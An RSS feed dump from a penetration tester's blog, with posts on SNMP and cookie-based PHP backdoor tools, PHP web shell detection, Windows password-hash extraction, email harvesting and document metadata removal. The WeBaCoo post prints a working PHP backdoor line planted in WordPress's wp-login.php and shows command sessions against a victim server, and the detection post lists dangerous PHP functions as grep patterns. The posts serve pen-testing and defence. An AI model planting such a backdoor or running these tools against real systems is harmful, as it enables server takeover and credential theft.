Anestis Bechtsoudis » Tools & Scripts http://bechtsoudis.com Driven by Passion for Challenges Tue, 01 Jul 2014 12:30:55 +0000 en-US hourly 1 http://wordpress.org/?v=3.9.2 SNMP-BCC — Relay-ing on SNMP for backdoor channel http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/#utm_source=rss&utm_medium=rss&utm_campaign=snmp-bcc-relay-ing-on-snmp-for-backdoor-channel http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/#comments Sun, 15 Jan 2012 00:19:11 +0000 http://bechtsoudis.com/?p=1134 Lately I’m working on an SNMP reflection toolkit to study the effects and impact ratio of SNMP Reflection DoS Attacks. During the development phase I spotted some interesting features at the Request-Reply SNMP working model. More specifically, I noticed that if you send an invalid SNMP OID at a GetRequest message the agent replies with a Response message including an error code and the same invalid OID, as specified in the relevant RFCs. SNMP-BCC (Backdoor Communication Channel) takes advantage of the above SNMP feature combined with IP source spoofing techniques, in order to create a stealth communication channel using the SNMP agent as a relay.

SNMP (Simple Network Management Protocol) is a UDP based protocol used mainly for monitor purposes. Its connectionless UDP nature makes SNMP exposed to IP source spoofing attacks. Although, this does not seem to concern network and system administrators as my pen-test cases reveal. The reason that usually (although wrongly) admins do not bother to secure their agents is the read-only behavior. While SNMP offers both read (get info) and write (set configuration variables) under most infrastructures only the read behavior is implemented serving monitor purposes. This creates a belief to admins that there are not any undergoing security risks shifting the problem to anti-spoofing mechanisms.

While messing around with SNMP functionalities the idea for developing SNMP-BCC was born as a PoC to the above wrong approach of the SNMP setups. SNMP-BCC is capable to create a stealth backdoor communication channel with an “owned” host using an SNMP agent as a relay. Initially the desired to sent data are packed following the ASN.1 OID prototype in an SNMP GetRequest packet. Then the source IP address of the UDP packet is altered to the end client’s IP address. This source spoofed packet is transmitted to the public SNMP agent (community string must be known). Of course the SNMP agent can not locate this invalid OID and replies with an error response for the given OID. This error response containing the unattached initial packed data is finally transferred to the end host. Then the client with the relevant decoder can parse the data.

SNMP-BCC is mainly a post exploitation tool that a pen-tester can use to establish a stealth and hard to detect communication channel with a compromised host. Despite the backdoor communcation purposes someone can use the tool for data leakage and node pivoting purposes. While writing this post, the whole project is in its early stage and I haven’t yet decided if it is worth continuing and if so the working model. Although, I developed and made public SNMP-BCC in order to have feedback from my colleagues and infosec community for the next steps.

SNMP-BCC is written in perl using the raw-sockets library and is available at Github under GPLv3 license. Using ‘snmpbcc.pl’ users can create spoofed SNMP packets with system commands under a user interactive pseudo shell mode. For testing purposes the project also includes the ‘backdoor.pl‘ file that serves as a listener in the end host client. I haven’t implemented a fully ASN.1 decoder at the backdoor code, that’s why the command is wrapped with some special characters (‘#$#’) in order to be easily obtained from the response message.

You can get the latest version of the tool by cloning the repository

git clone git://github.com/anestisb/SNMP-BCC.git

Or by directly downloading the zip project archive

https://github.com/anestisb/SNMP-BCC/zipball/master

Here is a screenshot with SNMP-BCC in action:

 

Your comments are greatly appreciated for tool’s evolution.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/feed/ 8
WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/#utm_source=rss&utm_medium=rss&utm_campaign=webacoo-web-backdoor-cookie-script-kit-the-birth http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/#comments Tue, 29 Nov 2011 14:48:47 +0000 http://bechtsoudis.com/?p=936 Recently I was messing around with some PHP backdoors capable to provide a “pseudo”-terminal connection with a remote web server injected with a chunk of malicious PHP code. All the existing script and tools (such as weevely, hookworm) send the shell commands hidden in HTTP header fields, although the server’s output is printed out as part of the HTML code. Inspired from the above implementations, I thought why not sending the server’s command output using the HTTP response headers. And under these dark thoughts WeBaCoo (Web Backdoor Cookie) script-kit has been released.

The general concept is pretty simple. Initially the backdoor PHP code is generated using payloads containing main PHP system functions that operate under a basic Cookie handling mechanism. After the code injection the client can send shell commands hidden in Cookie headers obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to client hidden (base64 encoded too) in Cookie headers.

WeBaCoo is written in perl and is available at github. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

 

Let’s see two case studies in order to present WeBaCoo‘s functionalities. I will use a local burp proxy (127.0.0.1:8080) to inspect the HTTP header cookies.

1. Simple case

The first scenario involves the addition of a new PHP file with the obfuscated backdoor code in the webroot path. After the addition the client can use the termninal mode to execute commands to the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload the backdoor.php in the victim server and start a “terminal” connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relative request and response recorded from burp are seen in the following screen-shots:

 

 

 

 

 

 

 

2. Complex case – backdooring wordpress login

WordPress familiar users know that before the login process, the server creates a Test-cookie to examine if broswer has cookies enabled. After that test cookie set I will inject the backdoor code unobfuscated. I create the PHP payload using the ‘passthru’ function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected under the Test-Cookie set. So the wp-login.php is as follow (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the relative request and response recorded from burp:

 

 

 

 

 

 

 

 

As you can see the communication data are pretty stealth and will not trigger regular application firewalls and IDS/IPS setups. Although, I will appreciate your feedeback from various tests under your setups to evaluate and evolve WeBaCoo functionalities.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/feed/ 5
Detect & Protect from PHP Backdoor Shells http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/#utm_source=rss&utm_medium=rss&utm_campaign=detect-protect-from-php-backdoor-shells http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/#comments Wed, 15 Jun 2011 13:26:53 +0000 http://bechtsoudis.com/?p=476 Recently I undertook to investigate a web server hacking incident. It was an up-to-date debian machine (apache2+php5+mysql) that hosted a joomla CMS for a logistic website. The web admin has installed a joomla extension plugin which allows users to put custom php code in their articles. The attacker has “phished” valid login credentials for the website and published an article in which he has placed a simple php backdoor shell. The malicious code haven’t been noticed from the moderator that approved the article and so the article normally come to public.

After finishing the forensic procedures, I found out that the attacker used the weevely tool to generate the php backdoor shell that he injected in the article. I have never experienced a relative php backdoor incident resulting in a two-day exhaustive investigation. After finding the problem and cleaning the infection, I conducted a little research for php backdoor detection/protection tools & scripts.

 

In the rest of the article I will summarize the basic steps of detecting and protecting from php malicious code. Of course there exist different approaches in order to detect/protect web malicious activities according to the working framework, although I try to provide a general guideline using tools and procedures that I have used in my working cases.

 

Step1 – PHP Configuration Security Auditing

PHP is a very powerful programing language but the running configuration must be tweaked very carefully in order to minimize the security holes. There exist several security auditing tools and scripts, but from the ones I have tested I preferred the phpsecinfo tool. phpsecinfo parse the php configuration and generates a web report with detailed information and improvement suggestions.

Here are some screenshots from an example report:

 

 

Step2 – Running Web Platform Configuration

Popular web CMS and platforms offer a large amount of extensions and plugins for their users. Inexperienced web developers & web admins tend to use as many as possible plugins, believing that this will make the website more attractive or functional. Although this approach from the security perspective is wrong, because more plugins result in more security risks.

The developers of these famous web platforms follow the latest security exploits and create relative patches, securing the core platform from already known attacks. On the other side, plugins’ source code is not that regularly revised and tested for security holes putting into great danger the whole platform.

Usually, most plugins follow the above rule, although there exist developers that tactically update their plugins’ source code providing sufficient security level. So you must not install unnecessary plugins in your web platform and in case that you have to, carefully investigate plugin’s source code and how it affects the core platform. Additionally, you should manually install the plugins in order to careful look and tweak the configuration variables and paths.

 

 

Step3 – Detection Tools & Scripts

PHP backdoor shells use php functions that execute external commands in the host machine. PHP users know these functions, so with a simple grep script someone can detect the files in which such function occur and investigate them to see if their are legitimate or malicious. Here is a simple bash script that searches for system functions, file streams and base64 encrypted code:

 

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/bash
 
#------------------------------------------------#
# Search web files for potential malicious code. #
#------------------------------------------------#
 
SEARCH_DIR="/var/www"
PATTERNS="passthru|shell_exec|system|phpinfo|base64_decode|popen|exec|proc_open|pcntl_exec|python_eval|fopen|fclose|readfile"
 
grep -RPl --include=*.{php,txt} "($PATTERNS)" $SEARCH_DIR
 
exit 0

 

Going one step further from simple search scripts there exist NeoPI. NeoPI is a python script that uses a variety of statistical methods to detect obfuscated and encrypted content within text/script files. I have tested NeoPI in the incident I mentioned, and the tool successfully located the malicious file and put it higher in the rank. Although, based on its statistical methods, NeoPI might put malicious files lower in the rank giving bigger risk percentage to legitimate files and disorientate your investigation.

 

For more advanced and comprehensive reports someone can turn into a malware scanner. In the incident that I examined I have used the LMD (Linux Malware Detect) scanner. This was the first time I used this tool and I have to say that I am very satisfied with its functionality. To furthermore test the tool, I created four other php backdoors using know scripts from pen-test frameworks, and LMD successfully found all of them.

 

And of course there exist the powerful ClamAV antivirus but I didn’t have time to setup it and test its results for the php backdoors that I mentioned. Although from what I have read in the web, it is very efficient and have successfully located php backdoors and malware code.

 

 

Step4 – Protection

Protection countermeasures are formed using the tools and information from the previous steps. Here are some bullets in the PHP configuration that sysadmins must pay attention:

    • allow_url_fopen: PHP file functions are allowed to include remote files from external FTP or HTTP locations. This option is enabled by default installation and is rarely used.
    • Dangerous PHP functions: Using the disable_functions field in the php.ini, disable all the dangerous PHP system functions (system, shell_exec, passthru etc) that might be used from malicious codes. Be careful with the rare cases in which some web platforms need some of these function.
    • open_basedir: Use this variable in the php.ini configuration to limit file operations to the defined directory and low.
    • web user permission: Carefully examine the web user access level and its permission.

 

By carefully editing the PHP security audit report options, adopting an automate malware detection tool and examining the bullets mentioned above, an adequate security level is established for your running web servers and platforms.

 

 

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/15/detect-protect-from-php-backdoor-shells/feed/ 4
Pastenum: Enumerating Text Dump Websites http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/#utm_source=rss&utm_medium=rss&utm_campaign=pastenum-enumerating-text-dump-websites http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/#comments Wed, 08 Jun 2011 16:24:49 +0000 http://bechtsoudis.com/?p=458 Text dump websites are used by programmers and system administrators to share and store pieces of source code and configuration information. Two of the most popular text dump websites are pastebin and pastie. Day by day more and more programmers, amateur system administrators and regular users are captivated by the attractive functional features of these web tools and use them in order to share large amounts of configuration and source code information. Therefore, like happening in each famous web platform, sensitive information sharing is inevitable. Potential attackers use these web platforms to gather information about their targets, while on the other side penetration testers search into these sites to prevent critical information leakage.

 

Most of the text dump web platforms offer a searching mechanism and therefore anyone can manually query the database for matching strings. Although an automated script/tool capable to query all these text dump websites and generate an overall searching report, would be very useful for the reconnaissance phase of a penetration test. Pen-testers can use such an automate tool, in order to efficiently search for potential configuration and login credentials information leakage that will help an attacker to profile the victim system and find a security hole.

Recently I came across in the web with such a script, pastenum. Pastenum is a ruby script written by Nullthreat member of the Corelan Team. It can query pastebin, pastie and github for user defined strings and generate an overall html report with the searching results.

 

Pastenum can be downloaded from here, while detailed installation information can be found here.

 

Let’s see some screenshots with pastenum in action.

 

 

 

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/08/pastenum-enumerating-text-dump-websites/feed/ 2
Gathering & Retrieving Windows Password Hashes http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/#utm_source=rss&utm_medium=rss&utm_campaign=gathering-retrieving-windows-password-hashes http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/#comments Sat, 04 Jun 2011 12:11:55 +0000 http://bechtsoudis.com/?p=437 Penetration tests might involve Windows user password auditing. In Windows systems (NT, 2000, XP, Vista, 7) user password hashes (LM and NTLM hashes) are stored in registry file named SAM (Security Accounts Manager). Until recently whenever I had to extract Windows password hashes I had two alternatives: the manual way or by using Windows password auditing suites (Cain&Abel, Ophcrack, L0phtCrack etc). But yesterday I came across in the web with a very useful python script named HashGrab2. HashGrab2 automatically mounts Windows drives and extracts username-password hashes from SAM and SYSTEM files located on the Windows drives using the samdump2 utility. HashGrab2 is ideal in cases that you just want to collect the Windows password hashes in order to import them to your preferred password cracker.

 

SAM Database Protection:

Offline Attacks: Microsoft introduced the SYSKEY utility in order partially encrypt the on-disk copy of the SAM file. Information about the SYSKEY encryption key is stored in the SYSTEM file located under the path %sysroot%/System32/config/.

Online Attacks: The SAM file cannot be moved or copied while Windows is running, since the Windows kernel obtains and keeps an exclusive filesystem lock on the SAM file, and will not release that lock until the operating system has shut down or a blue screen exception has been thrown.However, the in-memory copy of the contents of the SAM can be dumped using various techniques, making the password hashes available for offline brute-force attack.

 

HashGrab2:

HashGrab2,  written by s3my0n, is an offline gathering python script that automatically discover Windows drives and extracts the username-hash pairs to user defined file. HashGrab2 must be run as root (in order to mount the Windows drives) and requires python installed. It is preferable to install samdump2 from your distribution repositories in order to automatically acquire the username-hash pairs.

 

HashGrab2 can be downloaded from here.
zip md5sum:0db4f35062d773001669554c8e16015a

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
user1@bt5:Scripts$ ./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [-] Error: you are not root

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
root@bt5:Scripts$./hashgrab2.py 
 
  _               _                     _    ___  
 | |             | |                   | |  |__ \ 
 | |__   __ _ ___| |__   __ _ _ __ __ _| |__   ) |
 | '_ \ / _` / __| '_ \ / _` | '__/ _` | '_ \ / / 
 | | | | (_| \__ \ | | | (_| | | | (_| | |_) / /_ 
 |_| |_|\__,_|___/_| |_|\__, |_|  \__,_|_.__/____|
                         __/ |                    
                        |___/
 
 HashGrab v2.0 by s3my0n
 http://InterN0T.net
 Contact: RuSH4ck3R[at]gmail[dot]com
 
 [*] Mounted /dev/sda1 to /mnt/qWLgG5
 
 [*] Mounted /dev/sda2 to /mnt/4sDAQO
 
 [*] Copying SAM and SYSTEM files...
 
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it
 
Root Key : CMI-CreateHive{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}
 
 [*] Unmounting partitions...
 
 [*] Deleting mount directories...
 
 [*] Deleting ['./4sDAQO']

 

1
2
3
4
root@bt5:Applications$cat 4sDAQO.txt 
Administrator:500:HASH:::
Guest:501:HASH:::
user1:1001:HASH:::

 
 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 
 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/06/04/gathering-retrieving-windows-password-hashes/feed/ 0
Enumerating Metadata: Part3 odf files http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/#utm_source=rss&utm_medium=rss&utm_campaign=enumerating-metadata-part3-odf-files http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/#comments Thu, 12 May 2011 15:44:04 +0000 http://bechtsoudis.com/?p=415 In the third part of the Enumerating Metadata sequence, we will talk about Open Document Format (ODF) supported by popular document software suites (OpenOffice, LibreOffice, Microsoft Office 2007 and more). ODF are XML-based file formats used to represent new-age electronic documents (spreadsheets, presentations, word documents etc). The standard ODF file is a ZIP commpressed archive containing the appropriate files and directories. The document metadata information is stored in a seperate XML file under the name meta.xml. The types of metadata contained in the file can comprise pre-defined metadata, user defined metadata, as well as custom metadata (like ODF version, Title, Description  and more).

The most common filename extensions used for OpenDocument documents are:

  • .odt for word processing (text) documents
  • .ods for spreadsheets
  • .odp for presentations
  • .odb for databases
  • .odg for graphics
  • .odf for formulae, mathematical equations

A packaged ODF file will contain, at a minimum, six files and two directories archived into a modified ZIP file. The structure of the basic package is as follows

|-- META-INF
|   `-- manifest.xml
|-- Thumbnails
|   `-- thumbnail.png
|-- content.xml
|-- meta.xml
|-- mimetype
|-- settings.xml
`-- styles.xml

 

Important! In case you encrypt your document using a protection password, the meta.xml file is not encrypted and is readable from anyone without knowning the document password. So be careful, password protection does not solve the metadata problem.

 

We can see that ODF metadata types contain large amount of usable information profiling editors and their software tools. An attacker can gather this kind of information and create a startup point for his exploitation attacks. So it is important for document users to control the information leakage emanated from hidden metadata.

Document software suites, such as OpenOffice and LibreOffice, offer editing options (usually under the path File->Properties) for the metadata types. You can use this feature in order to edit or clean the desired fields. The problem is that the previous method is per file, so if you have a large document database of ODF files that you want to handle, you obvious need an automated tool/script. Because ODF files are zip containers the solution if pretty easy. You can massively delete or update all meta.xml document files using the zip tool and it’s delete/update options. In case you delete the meta.xml from a document be careful, because the next time the document is saved from the relevant software, the XML is recreated with the software’s predefined values for the metadata fields.

I usually do not want any metadata leakage for my documents, so I delete the meta.xml file from the document container. I wrote a simple bash script which delete all meta.xml files from ODF documents under a user specified directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/bin/bash
 
#============================================================#
# Author     : Anestis Bechtsoudis                           #
# Date       : 12 May 2011                                   #
# Description: Bash script that removes metadata (meta.xml)  #
# from ODF (Open Document Format) files used from OpenOffice #
#============================================================#
 
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 1 ] ; then
  echo "Usage: $0 [dir]"
  echo -e "\t[dir]: Directory containing ODF Files"
  exit
fi
 
#===============================================#
# Open Document format supports:                #
#    .odt for word processing (text) documents  #
#    .ods for spreadsheets                      #
#    .odp for presentations                     #
#    .odb for databases                         #
#    .odg for graphics                          #
#    .odf for formulae, mathematical equations  #
#                                               #
# Remove unwanted filetypes                     #
#===============================================#
FILETYPES='(odt)|(ods)|(odp)|(odb)|(odg)|(odf)'
 
# Temp file for search results
TMPFILE=/tmp/$0.tmp
 
find $1 -type f | egrep $FILETYPES > $TMPFILE
 
while read line
do
  zip -d $line meta.xml
done < $TMPFILE
 
rm $TMPFILE
 
IFS=$SAVEIFS

In case that you do not want to completely remove meta.xml files, you can write a basic meta.xml template and alter the above script in order update (instead of delete) all the meta.xml from ODF documents. The update can be done using the -f argument of the ZIP tool.

The above approach can be adopted under a Windows OS by writing the relevant batch files.
 

Useful sources:

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/12/enumerating-metadata-part3-odf-files/feed/ 0
Knowing is half the battle… http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/#utm_source=rss&utm_medium=rss&utm_campaign=knowing-is-half-the-battle%25e2%2580%25a6 http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/#comments Tue, 10 May 2011 19:46:43 +0000 http://bechtsoudis.com/?p=378 G.I. Joe used to say, “Knowing is half the battle.” The collection of prior information could make the difference between success and failure of a Penetration Test.

The first phase (reconnaissance phase) of a penetration test,  includes information gathering & network mapping procedures. Automated intelligent reconnaissance tools have been developed extensively the last years, offering a reliable and sprinting starting point for the exploitation phase. In this article, I will focus on information gathering tools in order to collect valid login names, emails, DNS records and WHOIS databases. A Penetration Tester can use the gathered information in order to profile the target, launch client side attacks, search into social networks for additional knowledge, bruteforce authentication mechanisms etc.

We can easily gather this information with simple scripts, without following an extensive OSINT (Open Source Intelligence) procedure. Although, I should mention that a detailed and extensive OSINT phase will have better results and will be necessary under certain business needs.

I will analyze Edge-Security’s theHarvester and Metasploit’s Search Email Collector tools.

 

theHarvester

theHarvester (currently at 2.0 version) is a python script that can gather email accounts, usernames and subdomains from public search engines and PGP key servers.

The tool supports the following sources:

  • Google – emails,subdomains/hostnames
  • Google profiles – Employee names
  • Bing search – emails, subdomains/hostnames,virtual hosts (requires bing API key)
  • Pgp servers – emails, subdomains/hostnames
  • Linkedin – Employee names
  • Exalead – emails,subdomain/hostnames

The latest version of theHarvester can be downloaded from the GitHub repository here.

Give execute permissions to the script file, and run it in order to see the available options.

$ ./theHarvester.py 
 
*************************************
*TheHarvester Ver. 2.0 (reborn)     *
*Coded by Christian Martorella      *
*Edge-Security Research             *
*cmartorella@edge-security.com      *
*************************************
 
Usage: theharvester options 
 
       -d: Domain to search or company name
       -b: Data source (google,bing,bingapi,pgp,linkedin,google-profiles,exalead,all)
       -s: Start in result number X (default 0)
       -v: Verify host name via dns resolution and search for vhosts(basic)
       -l: Limit the number of results to work with(bing goes from 50 to 50 results,
            google 100 to 100, and pgp does not use this option)
       -f: Save the results into an XML file
 
Examples:./theharvester.py -d microsoft.com -l 500 -b google
         ./theharvester.py -d microsoft.com -b pgp
         ./theharvester.py -d microsoft -l 200 -b linkedin

You can see some execution example in the following screenshots:

 

 

Metasploit Email Collector

Search email collector is a metasploit module written by Carlos Perez. The module runs under the metasploit framework and uses Google, Bing and Yahoo to create a list of valid email addresses for the target domain.

You can view the source code here.

The module options are:

DOMAIN The domain name to locate email addresses for
OUTFILE A filename to store the generated email list
SEARCH_BING Enable Bing as a backend search engine (default: true)
SEARCH_GOOGLE Enable Google as a backend search engine (default: true)
SEARCH_YAHOO Enable Yahoo! as a backend search engine (default: true)
PROXY Proxy server to route connection. <host>:<port>
PROXY_PASS Proxy Server Password
PROXY_USER Proxy Server User
WORKSPACE Specify the workspace for this module

 

Let’s see a running example:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf >; 
msf >; use auxiliary/gather/search_email_collector 
msf auxiliary(search_email_collector) >; set DOMAIN example.com
DOMAIN =>; example.com
msf auxiliary(search_email_collector) >; run
 
[*] Harvesting emails .....
[*] Searching Google for email addresses from example.com
[*] Extracting emails from Google search results...
[*] Searching Bing email addresses from example.com
[*] Extracting emails from Bing search results...
[*] Searching Yahoo for email addresses from example.com
[*] Extracting emails from Yahoo search results...
[*] Located 49 email addresses for example.com
[*] 	555-555-0199@example.com
[*] 	a@example.com
[*] 	alle@example.com
[*] 	b@example.com
[*] 	boer_faders@example.com
[*] 	ceo@example.com
[*] 	defaultemail@example.com
[*] 	email@example.com
[*] 	example@example.com
[*] 	foo@example.com
[*] 	fsmythe@example.com
[*] 	info@example.com
[*] 	joe@example.com
[*] 	joesmith@example.com
[*] 	johnnie@example.com
[*] 	johnsmith@example.com
[*] 	myname+spam@example.com
[*] 	myname@example.com
[*] 	name@example.com
[*] 	nobody@example.com
....

 

Useful links:

 

DISCLAIMER: I’m not responsible with what you do with this info. This information is for educational purposes only.

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/10/knowing-is-half-the-battle%e2%80%a6/feed/ 1
Enumerating Metadata: Part2 pdf files http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/#utm_source=rss&utm_medium=rss&utm_campaign=enumerating-metadata-part2-pdf-files http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/#comments Tue, 03 May 2011 00:26:57 +0000 http://bechtsoudis.com/?p=363 In my article Gathering & Analyzing Metadata Information I empasized the security risk of hidden metadata info of publicly shared documents and how this info can be gathered massively through certain tools. So I begun writing a series of articles in order to analyze the different types of file metadata and what tools can someone use in order to view and edit/remove them. In the first part, I analyzed the case of exif jpeg metadata and in this article I will continue with the famous Portable Document Format (PDF) file, presenting the appropriate tools to handle the metadata information.

We all use PDF files due to professional or personal needs of document sharing with others. PDF metadata is usually populated by PDF converting applications and might expose undesirable information to third-parties. Especially after the adoption of XMP (after version 1.6) in PDF metadata, there has been an increase in the available hidden information fields. Adobe Acrobat Pro offers an extended editor in order to edit metadata fields, but the Adobe Reader and many other editors and converters do not. Some of the metadata information fields are:

    • AdHocReviewCycleID
    • Appligent
    • Author
    • AuthorEmail
    • AuthorEmailDisplayName
    • Company
    • CreationDate
    • Creator
    • EmailSubject
    • Keywords
    • ModDate
    • PreviousAdHocReviewCycleID
    • Producer
    • PTEX.Fullbanner
    • SourceModified
    • Subject
    • Title

There exist a lot of tools that can extract/edit/remove PDF metadata information, but I prefer to use open source tools. So I will analyze the use of the PDF Toolkit (pdftk) under a linux environment. PDFTk does not require Acrobat and can run under Windows, Linux, Mac OS X, FreeBSD and Solaris systems. PDF Toolkit has many features but in this article I will cover the ones that we need for metadata manipulation.

Initially you will have to install pdftk using your distribution’s package manager or by compiling the sources.

In order to extract metadata information from a pdf file you can use the dump_data option as follows:

$pdftk file.pdf dump_data
InfoKey: Creator
InfoValue: PScript5.dll Version 5.2.2
InfoKey: Title
InfoValue: Microsoft Word - Ergastiriaki_Askisi_2011.doc
InfoKey: Author
InfoValue: Administrator
InfoKey: Producer
InfoValue: GPL Ghostscript 8.15
InfoKey: ModDate
InfoValue: D:20110406122119
InfoKey: CreationDate
InfoValue: D:20110406122119
PdfID0: bb8f9ac70cc66e8cabecb4144806f
PdfID1: bb8f9ac70cc66e8cabecb4144806f
NumberOfPages: 3

In order to edit metadata fields you have to extract metadata into a file, edit the desired values in the file and then update the pdf by importing the edited metadata file.

To extract metada to file use the output option:

$pdftk file.pdf dump_data output pdf-metada

Using your preferred text editor, you can edit the pdf-metadata InfoValues (I prefer to leave every field blank). Then you can update the initial file using the edited metadata file.

$pdftk file.pdf update_info pdf-metadata output no-metadata.pdf

In order to automate the above steps, I have wrote a simple script to work in a whole directory containing pdf files.

#!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
 
if [ $# -ne 2 ] ; then
        echo "Usage: $0 [dir] [meta-file]"
        echo -e "\t[search_dir]"
        echo -e "\t\tDirectory with pdf files"
        echo -e "\t[metafile]"
        echo -e "\t\tFile containing desired metadata"
        exit
fi
 
PDFTK="/usr/bin/pdftk"
SOURCEDIR="$1"
METAFILE="$2"
PDFTMPFILE="/tmp/temp.pdf"
 
for i in $( find $SOURCEDIR -type f -name "*.pdf" ); do
  cp $i $PDFTMPFILE
  $PDFTK $PDFTMPFILE update_info $METAFILE output $i
  rm $PDFTMPFILE
done
 
IFS=$SAVEIFS

And here is a clean metadata file that you can use:

InfoKey: Author
InfoValue:
InfoKey: Company
InfoValue:
InfoKey: CreationDate
InfoValue:
InfoKey: Creator
InfoValue:
InfoKey: ModDate
InfoValue:
InfoKey: Producer
InfoValue:
InfoKey: SourceModified
InfoValue:
InfoKey: Title
InfoValue:

 

 

A. Bechtsoudis

]]>
http://bechtsoudis.com/2011/05/03/enumerating-metadata-part2-pdf-files/feed/ 1
Gathering & Analyzing Metadata Information http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/#utm_source=rss&utm_medium=rss&utm_campaign=gathering-analyzing-metadata-information http://bechtsoudis.com/2011/05/02/gathering-analyzing-metadata-information/#comments Sun, 01 May 2011 23:14:55 +0000 http://bechtsoudis.com/?p=346 Any organization or individual who sends or receives files (documents, spreadsheets, images etc) electronically needs to be aware of the dangers of hidden metadata. Metadata information includes user names, path and system information (like directories on your hard drive or network share), software versions, and more. This data can be used for a brute-force attack, social engineering, or finding pockets of critical data once inside a compromised network. Thwarting an attacker’s attempts to exploit the metadata easily found on your company’s or personal website, in digital documents, and in search-engine caches is hard, if not nearly impossible.

